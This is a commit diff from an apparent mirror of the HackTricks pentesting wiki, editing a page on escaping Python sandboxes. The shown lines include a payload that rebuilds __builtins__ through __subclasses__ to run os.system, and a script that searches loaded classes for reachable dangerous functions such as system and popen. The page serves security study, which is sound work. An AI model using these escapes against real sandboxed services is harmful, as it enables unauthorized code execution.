mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 14:10:41 +00:00
GitBook: [master] one page modified
This commit is contained in:
parent
e60ea923d3
commit
e2bfe2cb32
1 changed files with 12 additions and 1 deletions
|
@ -223,6 +223,17 @@ __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__
|
||||||
__builtins__["__import__"]('os').system('ls')
|
__builtins__["__import__"]('os').system('ls')
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Discovering loaded variables
|
||||||
|
|
||||||
|
Checking the **`globals`** and **`locals`** is a good way to know what you can access.
|
||||||
|
|
||||||
|
```python
|
||||||
|
>>> globals()
|
||||||
|
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <class '_frozen_importlib.BuiltinImporter'>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, 'attr': <module 'attr' from '/usr/local/lib/python3.9/site-packages/attr.py'>, 'a': <class 'importlib.abc.Finder'>, 'b': <class 'importlib.abc.MetaPathFinder'>, 'c': <class 'str'>, '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', <class 'DeprecationWarning'>, 1): True}, 'z': <class 'str'>}
|
||||||
|
>>> locals()
|
||||||
|
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <class '_frozen_importlib.BuiltinImporter'>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, 'attr': <module 'attr' from '/usr/local/lib/python3.9/site-packages/attr.py'>, 'a': <class 'importlib.abc.Finder'>, 'b': <class 'importlib.abc.MetaPathFinder'>, 'c': <class 'str'>, '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', <class 'DeprecationWarning'>, 1): True}, 'z': <class 'str'>}
|
||||||
|
```
|
||||||
|
|
||||||
### Discovering more loaded methods for arbitrary execution
|
### Discovering more loaded methods for arbitrary execution
|
||||||
|
|
||||||
Here I want to explain how to easily discover **more dangerous functionalities loaded** and propose more reliable exploits.
|
Here I want to explain how to easily discover **more dangerous functionalities loaded** and propose more reliable exploits.
|
||||||
|
@ -310,7 +321,7 @@ Moreover, if you think **other libraries** may be able to **invoke functions to
|
||||||
|
|
||||||
```python
|
```python
|
||||||
bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip"]
|
bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip"]
|
||||||
bad_func_names = ["system", "popen", "getstatusoutput", "getoutput", "call", "Popen", "spawn", "import_module", "__import__", "load_source", "execfile", "execute", "__builtins__", "__globals__"]
|
bad_func_names = ["system", "popen", "getstatusoutput", "getoutput", "call", "Popen", "spawn", "import_module", "__import__", "load_source", "execfile", "execute", "__builtins__"]
|
||||||
for b in bad_libraries_names + bad_func_names:
|
for b in bad_libraries_names + bad_func_names:
|
||||||
vuln_funcs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) for k in x.__init__.__globals__ if k == b ]
|
vuln_funcs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) for k in x.__init__.__globals__ if k == b ]
|
||||||
print(f"{b}: {', '.join(vuln_funcs)}")
|
print(f"{b}: {', '.join(vuln_funcs)}")
|
||||||
|
|
Loading…
Reference in a new issue